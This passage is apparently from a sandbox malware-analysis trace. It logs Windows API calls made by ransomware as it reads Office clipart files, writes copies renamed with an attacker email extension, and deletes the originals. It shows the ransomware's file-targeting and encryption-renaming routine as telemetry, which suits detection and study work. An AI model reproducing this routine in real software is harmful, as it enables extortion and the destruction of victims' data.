(lpString=".rar") returned 4 [0057.712] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.712] lstrlenW (lpString=".bz2") returned 4 [0057.712] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.712] lstrlenW (lpString=".7z") returned 3 [0057.713] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0057.713] lstrlenW (lpString=".dbf") returned 4 [0057.713] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0057.713] lstrlenW (lpString=".1cd") returned 4 [0057.713] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 63 [0057.713] lstrlenW (lpString=".jpg") returned 4 [0057.713] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.713] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=14444) returned 1 [0057.713] CloseHandle (hObject=0x214) returned 1 [0057.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf")) returned 0x20 [0057.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0057.713] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.713] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0057.714] GetLastError () returned 0x0 [0057.714] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x386c, lpOverlapped=0x0) returned 1 [0057.715] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x3870, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x3870, lpOverlapped=0x0) returned 1 [0057.716] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0057.716] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.716] SetEndOfFile (hFile=0x178) returned 1 [0057.717] CloseHandle (hObject=0x178) returned 1 [0057.717] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.717] SetEndOfFile (hFile=0x214) returned 1 [0057.717] CloseHandle (hObject=0x214) returned 1 [0057.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.718] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00247_.wmf")) returned 1 [0057.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0057.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0057.718] lstrlenW (lpString=".doc") returned 4 [0057.718] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.718] lstrlenW (lpString=".docx") returned 5 [0057.718] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.718] lstrlenW (lpString=".pdf") returned 4 [0057.718] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.718] lstrlenW (lpString=".xls") returned 4 [0057.718] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.718] lstrlenW (lpString=".xlsx") returned 5 [0057.718] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.718] lstrlenW (lpString=".ppt") returned 4 [0057.718] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0057.718] lstrlenW (lpString=".zip") returned 4 [0057.718] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.718] lstrlenW (lpString=".rar") returned 4 [0057.718] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.718] lstrlenW (lpString=".bz2") returned 4 [0057.718] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.719] lstrlenW (lpString=".7z") returned 3 [0057.719] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0057.719] lstrlenW (lpString=".dbf") returned 4 [0057.719] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0057.719] lstrlenW (lpString=".1cd") returned 4 [0057.719] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00247_.WMF") returned 63 [0057.719] lstrlenW (lpString=".jpg") returned 4 [0057.719] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.720] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=1536) returned 1 [0057.720] CloseHandle (hObject=0x214) returned 1 [0057.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf")) returned 0x20 [0057.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0057.720] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.720] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0057.720] GetLastError () returned 0x0 [0057.720] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x600, lpOverlapped=0x0) returned 1 [0057.722] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x610, lpOverlapped=0x0) returned 1 [0057.723] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0057.723] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.723] SetEndOfFile (hFile=0x178) returned 1 [0057.723] CloseHandle (hObject=0x178) returned 1 [0057.723] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.723] SetEndOfFile (hFile=0x214) returned 1 [0057.724] CloseHandle (hObject=0x214) returned 1 [0057.724] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.724] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf")) returned 1 [0057.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0057.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0057.724] lstrlenW (lpString=".doc") returned 4 [0057.724] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.724] lstrlenW (lpString=".docx") returned 5 [0057.724] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.724] lstrlenW (lpString=".pdf") returned 4 [0057.724] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.724] lstrlenW (lpString=".xls") returned 4 [0057.724] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.724] lstrlenW (lpString=".xlsx") returned 5 [0057.724] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.724] lstrlenW (lpString=".ppt") returned 4 [0057.724] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0057.725] lstrlenW (lpString=".zip") returned 4 [0057.725] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.725] lstrlenW (lpString=".rar") returned 4 [0057.725] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.725] lstrlenW (lpString=".bz2") returned 4 [0057.725] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.725] lstrlenW (lpString=".7z") returned 3 [0057.725] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0057.725] lstrlenW (lpString=".dbf") returned 4 [0057.725] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0057.725] lstrlenW (lpString=".1cd") returned 4 [0057.725] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.725] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63 [0057.725] lstrlenW (lpString=".jpg") returned 4 [0057.725] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.725] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=4708) returned 1 [0057.725] CloseHandle (hObject=0x214) returned 1 [0057.725] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf")) returned 0x20 [0057.725] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0057.726] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.726] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0057.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0057.726] GetLastError () returned 0x0 [0057.726] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x1264, lpOverlapped=0x0) returned 1 [0058.047] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x1270, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x1270, lpOverlapped=0x0) returned 1 [0058.048] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0058.048] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.048] SetEndOfFile (hFile=0x178) returned 1 [0058.048] CloseHandle (hObject=0x178) returned 1 [0058.048] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.048] SetEndOfFile (hFile=0x214) returned 1 [0058.049] CloseHandle (hObject=0x214) returned 1 [0058.049] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.049] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf")) returned 1 [0058.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0058.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0058.049] lstrlenW (lpString=".doc") returned 4 [0058.049] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.049] lstrlenW (lpString=".docx") returned 5 [0058.050] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.050] lstrlenW (lpString=".pdf") returned 4 [0058.050] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.050] lstrlenW (lpString=".xls") returned 4 [0058.050] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.050] lstrlenW (lpString=".xlsx") returned 5 [0058.050] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.050] lstrlenW (lpString=".ppt") returned 4 [0058.050] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0058.050] lstrlenW (lpString=".zip") returned 4 [0058.050] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.050] lstrlenW (lpString=".rar") returned 4 [0058.050] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.050] lstrlenW (lpString=".bz2") returned 4 [0058.050] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.050] lstrlenW (lpString=".7z") returned 3 [0058.050] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0058.050] lstrlenW (lpString=".dbf") returned 4 [0058.050] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0058.050] lstrlenW (lpString=".1cd") returned 4 [0058.050] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF") returned 63 [0058.050] lstrlenW (lpString=".jpg") returned 4 [0058.050] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.051] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=9590) returned 1 [0058.051] CloseHandle (hObject=0x214) returned 1 [0058.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf")) returned 0x20 [0058.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0058.051] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.051] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0058.051] GetLastError () returned 0x0 [0058.051] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x2576, lpOverlapped=0x0) returned 1 [0058.053] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x2580, lpOverlapped=0x0) returned 1 [0058.054] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0058.054] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.054] SetEndOfFile (hFile=0x178) returned 1 [0058.054] CloseHandle (hObject=0x178) returned 1 [0058.054] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.054] SetEndOfFile (hFile=0x214) returned 1 [0058.055] CloseHandle (hObject=0x214) returned 1 [0058.055] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.055] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf")) returned 1 [0058.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0058.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0058.055] lstrlenW (lpString=".doc") returned 4 [0058.055] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.056] lstrlenW (lpString=".docx") returned 5 [0058.056] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.056] lstrlenW (lpString=".pdf") returned 4 [0058.056] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.056] lstrlenW (lpString=".xls") returned 4 [0058.056] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.056] lstrlenW (lpString=".xlsx") returned 5 [0058.056] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.056] lstrlenW (lpString=".ppt") returned 4 [0058.056] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0058.056] lstrlenW (lpString=".zip") returned 4 [0058.056] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.056] lstrlenW (lpString=".rar") returned 4 [0058.056] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.056] lstrlenW (lpString=".bz2") returned 4 [0058.056] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.056] lstrlenW (lpString=".7z") returned 3 [0058.056] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0058.056] lstrlenW (lpString=".dbf") returned 4 [0058.056] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0058.056] lstrlenW (lpString=".1cd") returned 4 [0058.056] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 63 [0058.056] lstrlenW (lpString=".jpg") returned 4 [0058.056] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.057] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=27552) returned 1 [0058.057] CloseHandle (hObject=0x214) returned 1 [0058.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf")) returned 0x20 [0058.057] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0058.057] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.057] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0058.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0058.057] GetLastError () returned 0x0 [0058.057] ReadFile (in: hFile=0x214, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x6ba0, lpOverlapped=0x0) returned 1 [0058.059] WriteFile (in: hFile=0x178, 